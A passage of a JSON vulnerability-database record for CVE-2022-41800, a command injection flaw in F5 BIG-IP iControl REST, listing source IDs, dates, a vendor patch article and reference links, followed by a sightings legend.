"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2022-41800",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-438078"
},
{
"db": "VULMON",
"id": "CVE-2022-41800"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-023344"
},
{
"db": "PACKETSTORM",
"id": "170847"
},
{
"db": "CNNVD",
"id": "CNNVD-202211-2947"
},
{
"db": "NVD",
"id": "CVE-2022-41800"
}
]
},
"id": "VAR-202211-1118",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-438078"
}
],
"trust": 0.01
},
"last_update_date": "2024-08-14T15:11:12.151000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "K13325942",
"trust": 0.8,
"url": "https://support.f5.com/csp/article/K13325942"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-023344"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-77",
"trust": 1.1
},
{
"problemtype": "Command injection (CWE-77) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-438078"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-023344"
},
{
"db": "NVD",
"id": "CVE-2022-41800"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://support.f5.com/csp/article/k13325942"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-41800"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/170847/f5-big-ip-create-administrative-user.html"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/f5-big-ip-privilege-escalation-via-icontrol-rest-39928"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/170008/f5-big-ip-icontrol-remote-command-execution.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.5995"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2022-41800/"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/169967/f5-big-ip-icontrol-cross-site-request-forgery.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-41622"
},
{
"trust": 0.1,
"url": "https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/\u0027],"
},
{
"trust": 0.1,
"url": "https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-privesc.rb"
},
{
"trust": 0.1,
"url": "https://github.com/rapid7/metasploit-framework"
},
{
"trust": 0.1,
"url": "https://support.f5.com/csp/article/k97843387\u0027],"
},
{
"trust": 0.1,
"url": "https://metasploit.com/download"
},
{
"trust": 0.1,
"url": "https://github.com/rbowes-r7/refreshing-mcp-tool\u0027],"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-438078"
},
{
"db": "VULMON",
"id": "CVE-2022-41800"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-023344"
},
{
"db": "PACKETSTORM",
"id": "170847"
},
{
"db": "CNNVD",
"id": "CNNVD-202211-2947"
},
{
"db": "NVD",
"id": "CVE-2022-41800"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-438078"
},
{
"db": "VULMON",
"id": "CVE-2022-41800"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-023344"
},
{
"db": "PACKETSTORM",
"id": "170847"
},
{
"db": "CNNVD",
"id": "CNNVD-202211-2947"
},
{
"db": "NVD",
"id": "CVE-2022-41800"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-12-07T00:00:00",
"db": "VULHUB",
"id": "VHN-438078"
},
{
"date": "2023-11-28T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2022-023344"
},
{
"date": "2023-02-03T14:49:22",
"db": "PACKETSTORM",
"id": "170847"
},
{
"date": "2022-11-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202211-2947"
},
{
"date": "2022-12-07T04:15:10.480000",
"db": "NVD",
"id": "CVE-2022-41800"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-12-12T00:00:00",
"db": "VULHUB",
"id": "VHN-438078"
},
{
"date": "2023-11-28T07:02:00",
"db": "JVNDB",
"id": "JVNDB-2022-023344"
},
{
"date": "2023-02-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202211-2947"
},
{
"date": "2023-11-07T03:53:00.727000",
"db": "NVD",
"id": "CVE-2022-41800"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202211-2947"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural \u00a0F5\u00a0Networks\u00a0 Command injection vulnerabilities in the product",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-023344"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "command injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202211-2947"
}
],
"trust": 0.6
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.
Loading…
Loading…